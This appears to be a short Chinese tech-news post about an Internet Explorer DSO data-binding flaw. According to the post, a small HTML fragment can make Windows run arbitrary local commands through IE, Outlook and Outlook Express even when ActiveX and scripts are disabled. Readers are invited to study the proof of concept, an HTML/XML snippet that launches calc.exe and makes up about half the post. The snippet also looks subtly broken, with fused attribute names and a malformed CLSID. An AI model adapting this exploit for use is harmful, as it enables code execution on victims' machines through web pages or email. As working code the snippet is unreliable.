让Windows系统自动执行任何本地命令

一位以色列安全专家发现，只要使用一小段HTML代码，就可以让Windows系统自动执行任何本地命令。这一漏洞可在IE、Outlook和OutlooK Express上发生，即使在这些程序的安全设定中已经禁止掉了ActiveX和脚本的执行。究其根源，它是由一个早在IE4时代就存在的名为DSO的漏洞引起的。有兴趣的话，大家可以研究一下下面这段可以自动运行Windows计算器的代码。

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xmlid="oExec">
<security>
<exploit>
<![CDATA[
<objectid="oFile" classid="clsid:11111111-1111-1111-11111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>